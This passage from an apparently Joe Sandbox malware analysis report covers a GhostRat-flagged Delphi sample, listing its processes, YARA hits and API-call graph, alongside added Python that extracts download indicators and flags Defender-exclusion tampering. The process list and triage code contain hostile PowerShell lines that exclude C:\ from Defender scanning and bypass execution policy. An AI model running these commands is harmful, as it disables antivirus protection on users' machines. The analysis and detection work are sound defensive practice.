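x-oss-hash-crc64ecma: 7602638133618041147
x-oss-storage-class: Standard
x-oss-ec: 0048-00000113
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: tSuiuZEIxJY4muW7gfplNw==
x-oss-server-time: 10
"""

# First 64 bytes of the response body (the DOS header) from the "Data Raw" dump above.
FIRST_BODY_BYTES = bytes.fromhex(
    "4d5a90000300000004000000ffff0000"
    "b8000000000000004000000000000000"
    "00000000000000000000000000000000"
    "00000000000000000000000028010000"
)

def parse_headers(raw: str) -> dict:
    """Parse an HTTP/1.1 message head; names are lower-cased, the start line sits under ':start'."""
    lines = raw.strip().splitlines()
    headers = {":start": lines[0].strip()}
    for line in lines[1:]:
        if not line.strip():
            break  # a blank line ends the head
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers

def content_md5_hex(headers: dict) -> str:
    """Content-MD5 is the raw 16-byte digest in base64 (RFC 1864); return it as lower-case hex."""
    digest = base64.b64decode(headers["content-md5"], validate=True)
    if len(digest) != 16:
        raise ValueError("Content-MD5 does not decode to a 16-byte MD5 digest")
    return digest.hex()

def etag_hex(headers: dict) -> str:
    """Unquote the ETag; OSS fills it with the object MD5 for single-part uploads only."""
    return headers["etag"].strip().strip('"').lower()

def dos_header_info(body_prefix: bytes) -> dict:
    """Check the MZ magic and read e_lfanew (offset 0x3c), where the PE header starts."""
    if len(body_prefix) < 0x40:
        raise ValueError("need at least 64 bytes to read the DOS header")
    return {"is_mz": body_prefix[:2] == b"MZ",
            "e_lfanew": struct.unpack_from("<I", body_prefix, 0x3C)[0]}

def payload_iocs(raw_request: str, raw_response: str, body_prefix: bytes) -> dict:
    """Collect the pivot points: URL parts, size, MD5 from the headers, and whether they agree."""
    req, resp = parse_headers(raw_request), parse_headers(raw_response)
    _method, path, _version = req[":start"].split(" ", 2)
    md5 = content_md5_hex(resp)
    dos = dos_header_info(body_prefix)
    return {
        "host": req["host"],
        "path": path,
        "user_agent": req.get("user-agent", ""),
        "content_length": int(resp["content-length"]),
        "md5": md5,
        "md5_matches_etag": md5 == etag_hex(resp),
        "forced_download": resp.get("x-oss-force-download") == "true",
        "body_is_pe_stub": dos["is_mz"],
        "e_lfanew": dos["e_lfanew"],
    }

if __name__ == "__main__":
    for key, value in payload_iocs(REQUEST, RESPONSE_HEADERS, FIRST_BODY_BYTES).items():
        print(f"{key:>18}: {value}")
```

Content-MD5 is supplied by whoever uploaded the object, so treat the decoded value as the expected hash of the download rather than proof of what was written to disk: hash the dropped file and compare. The User-Agent string URLDownloader together with the x-oss-force-download and Content-Disposition: attachment pair are cheap proxy-log pivots for the same download.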


                                                                                  Target ID:0
                                                                                  Start time:01:14:55
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Users\user\Desktop\leBwnyHIgx.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\leBwnyHIgx.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:2'581'432 bytes
                                                                                  MD5 hash:2A7776214C4870137FE8AABB231CF52E
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Borland Delphi
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:1
                                                                                  Start time:01:14:58
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                                                  Imagebase:0x240000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:01:14:58
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:01:14:58
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                                                  Imagebase:0x690000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true
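
Targets 1 and 3 show the evasion step in full: cmd.exe spawns powershell.exe with -ExecutionPolicy Bypass and adds C:\ as a Defender exclusion path, which silences scanning for the whole system drive before the persisted copy under AppData is started. The following is an added example, not part of the report or of the sample: it classifies command lines like these by how broad the exclusion is, and also unwraps -EncodedCommand so the same cmdlet hidden in base64 is caught. The two hostile command lines are copied from the process list above; the narrow admin exclusion and the encoded variant are constructed here for contrast, and all function names are mine:

```python
"""Triage process command lines for Windows Defender exclusion tampering.
Added example, not part of the Joe Sandbox report: CMD_WRAPPER and POWERSHELL_CHILD
are copied from Target ID 1 and 3 above; ADMIN_EXCLUSION and the encoded variant
are constructed here for contrast.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

CMD_WRAPPER = (
    '"C:\\Windows\\System32\\cmd.exe" /C powershell -ExecutionPolicy Bypass '
    "-Command \"Add-MpPreference -ExclusionPath 'C:\\'\""
)
POWERSHELL_CHILD = (
    "powershell -ExecutionPolicy Bypass "
    "-Command \"Add-MpPreference -ExclusionPath 'C:\\'\""
)
# Constructed: a narrow exclusion an administrator might legitimately add.
ADMIN_EXCLUSION = (
    "powershell -Command \"Add-MpPreference "
    "-ExclusionPath 'C:\\Program Files\\BuildAgent\\cache'\""
)

ENCODED_RE = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{8,})", re.I)
BYPASS_RE = re.compile(r"-(?:ExecutionPolicy|ep)\s+Bypass\b", re.I)
# One -Exclusion<Kind> parameter and its value(s), up to the next parameter,
# a statement separator, the closing quote of -Command, or end of string.
EXCLUSION_PARAM_RE = re.compile(
    r"-Exclusion(Path|Process|Extension|IpAddress)\s+(.+?)(?=\s+-[A-Za-z]|\s*[;|\"]|\s*$)",
    re.I,
)
ROOT_DRIVE_RE = re.compile(r"^[A-Za-z]:\\?$")

def encode_powershell(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None when absent or malformed."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def extract_exclusions(script: str) -> List[Tuple[str, str]]:
    """Return (kind, value) for every exclusion handed to Add-MpPreference, comma lists included."""
    if not re.search(r"\bAdd-MpPreference\b", script, re.I):
        return []
    found = []
    for m in EXCLUSION_PARAM_RE.finditer(script):
        kind = m.group(1).lower()
        for raw in m.group(2).split(","):
            value = raw.strip().strip("'\"")
            if value:
                found.append((kind, value))
    return found

@dataclass
class Finding:
    commandline: str
    severity: str  # "low", "medium" or "high"
    reasons: List[str] = field(default_factory=list)
    exclusions: List[Tuple[str, str]] = field(default_factory=list)

def analyze(cmdline: str) -> Optional[Finding]:
    """Classify one command line; None means nothing of interest was seen."""
    reasons: List[str] = []
    script = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded command decoded")
        script = cmdline + " " + decoded  # look at wrapper and payload together
    if BYPASS_RE.search(cmdline):
        reasons.append("execution policy bypass")
    exclusions = extract_exclusions(script)
    if exclusions:
        whole_drive = any(k == "path" and ROOT_DRIVE_RE.match(v) for k, v in exclusions)
        reasons.append("whole-drive Defender exclusion" if whole_drive else "Defender exclusion added")
        severity = "high" if whole_drive else "medium"
    elif reasons:
        severity = "low"
    else:
        return None
    return Finding(cmdline, severity, reasons, exclusions)

def triage(cmdlines: List[str]) -> List[Finding]:
    """Run analyze() over a batch of command lines and keep only the hits."""
    return [f for f in map(analyze, cmdlines) if f is not None]

if __name__ == "__main__":
    encoded = "powershell -nop -w hidden -EncodedCommand " + encode_powershell(
        "Add-MpPreference -ExclusionPath 'C:\\'"
    )
    for finding in triage([CMD_WRAPPER, POWERSHELL_CHILD, ADMIN_EXCLUSION, encoded]):
        print(finding.severity.upper(), finding.reasons, finding.exclusions)
```

On a live host the same question is answered by Get-MpPreference (ExclusionPath, ExclusionProcess, ExclusionExtension) and the offending entry is removed with Remove-MpPreference; a root-of-drive exclusion like the one here should be handled as an incident, not as a misconfiguration, because everything the sample later drops under that path is invisible to real-time scanning.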

                                                                                  Target ID:4
                                                                                  Start time:01:15:00
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                  Imagebase:0x7ff693ab0000
                                                                                  File size:496'640 bytes
                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:01:15:02
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Users\user\AppData\Roaming\leBwnyHIgx.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\leBwnyHIgx.exe"
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:2'581'432 bytes
                                                                                  MD5 hash:2A7776214C4870137FE8AABB231CF52E
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Borland Delphi
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2572510543.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3807432806.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3107343124.0000000003FE6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3504281885.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2572570751.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2916173628.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3847762945.000000000092F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2231349112.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3992441735.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.4134424377.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3282299406.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3107580457.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3847713177.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2956428544.000000000090E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2729342507.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2956631944.0000000003FE1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3635220624.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.4135196957.00000000044E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.4134301268.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3807432806.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2394511408.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2092467129.00000000008FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3462916069.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2916173628.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3787990039.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3462635907.0000000000925000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2394414538.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2107248320.0000000004221000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2231413227.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.4134547256.0000000002EF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.4135092176.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3148323285.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2729432226.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3462916069.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3107145495.000000000090E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3107580457.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 24%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  Target ID:6
                                                                                  Start time:01:15:02
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                  Imagebase:0x240000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:7
                                                                                  Start time:01:15:02
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:8
                                                                                  Start time:01:15:02
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                  Imagebase:0x690000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:9
                                                                                  Start time:01:15:03
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                                                                                  Imagebase:0x240000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:10
                                                                                  Start time:01:15:03
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:11
                                                                                  Start time:01:15:03
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                                                                                  Imagebase:0x690000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:15
                                                                                  Start time:01:15:29
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                  Imagebase:0x240000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:16
                                                                                  Start time:01:15:29
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                  Imagebase:0x240000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:17
                                                                                  Start time:01:15:29
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:18
                                                                                  Start time:01:15:29
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:19
                                                                                  Start time:01:15:29
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                  Imagebase:0x690000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:20
                                                                                  Start time:01:15:29
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                  Imagebase:0x690000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true


                                                                                    Execution Graph

                                                                                    Execution Coverage:9.6%
                                                                                    Dynamic/Decrypted Code Coverage:73.7%
                                                                                    Signature Coverage:8.9%
                                                                                    Total number of Nodes:1075
                                                                                    Total number of Limit Nodes:28
40c1b9 IsValidLocale 29411 40c217 EnterCriticalSection 29410->29411 29412 40c1c8 29410->29412 29415 40c22f 29411->29415 29413 40c1d1 29412->29413 29414 40c1dc 29412->29414 29462 40c040 6 API calls 29413->29462 29463 40be44 IsValidLocale GetLocaleInfoW GetLocaleInfoW 29414->29463 29420 40c240 LeaveCriticalSection 29415->29420 29418 40c1e5 GetSystemDefaultUILanguage 29418->29411 29421 40c1ef 29418->29421 29419->29390 29420->29419 29422 40c200 GetSystemDefaultUILanguage 29421->29422 29464 40be44 IsValidLocale GetLocaleInfoW GetLocaleInfoW 29422->29464 29424 40c1da 29424->29411 29426 40c8f7 29425->29426 29427 40c983 29426->29427 29465 40c86c 29426->29465 29427->29392 29470 4087fc 29429->29470 29432 40ca0c 29433 40c86c 2 API calls 29432->29433 29434 40ca20 29433->29434 29435 40ca4e 29434->29435 29436 40c86c 2 API calls 29434->29436 29435->29382 29436->29435 29438 40c4a7 29437->29438 29439 40c4bb GetModuleFileNameW 29438->29439 29440 40c4d0 29438->29440 29439->29440 29441 40c4f8 RegOpenKeyExW 29440->29441 29447 40c69f 29440->29447 29442 40c5b9 29441->29442 29443 40c51f RegOpenKeyExW 29441->29443 29459 40c2a0 7 API calls 29442->29459 29443->29442 29444 40c53d RegOpenKeyExW 29443->29444 29444->29442 29448 40c55b RegOpenKeyExW 29444->29448 29446 40c5d7 RegQueryValueExW 29449 40c5f5 29446->29449 29450 40c628 RegQueryValueExW 29446->29450 29447->29403 29448->29442 29451 40c579 RegOpenKeyExW 29448->29451 29454 40c5fd RegQueryValueExW 29449->29454 29452 40c644 29450->29452 29457 40c626 29450->29457 29451->29442 29453 40c597 RegOpenKeyExW 29451->29453 29455 40c64c RegQueryValueExW 29452->29455 29453->29442 29453->29447 29454->29457 29455->29457 29456 40c68e RegCloseKey 29456->29403 29457->29456 29458->29400 29459->29446 29461 40871e 29460->29461 29461->29410 29462->29424 29463->29418 29464->29424 29466 40c881 29465->29466 29467 40c89e FindFirstFileW 29466->29467 29468 40c8ae FindClose 29467->29468 29469 40c8b4 29467->29469 29468->29469 29469->29426 29471 408800 
GetUserDefaultUILanguage GetLocaleInfoW 29470->29471 29471->29432 29472 42866f SetErrorMode 29473 cd0032 29483 cd0ae4 GetPEB 29473->29483 29476 cd0ae4 GetPEB 29479 cd02a7 29476->29479 29477 cd04a6 GetNativeSystemInfo 29478 cd04d3 VirtualAlloc 29477->29478 29480 cd0a9c 29477->29480 29481 cd04ec 29478->29481 29479->29477 29479->29480 29481->29480 29485 10015df0 29481->29485 29484 cd029b 29483->29484 29484->29476 29493 10015820 29485->29493 29488 10015e20 CloseHandle exit 29490 10015e6e 29488->29490 29489 10015e37 GetCurrentThread WaitForSingleObject CreateThread 29550 10015490 20 API calls 29489->29550 30293 1000b570 60 API calls 2 library calls 29489->30293 29490->29480 29492 10015e63 exit 29492->29490 29494 10015860 29493->29494 29551 10015750 GetModuleFileNameA 29494->29551 29496 10015876 29563 10015450 29496->29563 29500 100158d2 29501 10002cb0 _invalid_parameter_noinfo_noreturn 29500->29501 29502 10015973 29501->29502 29503 1001597b 29502->29503 29507 100159a2 _Smanip _Error_objects 29502->29507 29504 10002cb0 _invalid_parameter_noinfo_noreturn 29503->29504 29505 1001598a 29504->29505 29506 10002cb0 _invalid_parameter_noinfo_noreturn 29505->29506 29508 1001599c CreateMutexA GetLastError 29506->29508 29569 10012640 29507->29569 29508->29488 29508->29489 29512 10015b57 _Smanip _Error_objects 29513 10012640 9 API calls 29512->29513 29514 10015bda 29513->29514 29515 10005400 9 API calls 29514->29515 29516 10015bf1 29515->29516 29579 10013890 29516->29579 29519 10002cb0 _invalid_parameter_noinfo_noreturn 29520 10015c42 29519->29520 29582 10012620 29520->29582 29523 10002cb0 _invalid_parameter_noinfo_noreturn 29524 10015c60 29523->29524 29525 10012620 _invalid_parameter_noinfo_noreturn 29524->29525 29526 10015c6f memset 29525->29526 29527 10002b60 29526->29527 29528 10015cc0 ShellExecuteExA 29527->29528 29529 10015d13 29528->29529 29530 10015ceb 29528->29530 29533 10002cb0 _invalid_parameter_noinfo_noreturn 29529->29533 29531 10015d11 29530->29531 29532 10015cf4 
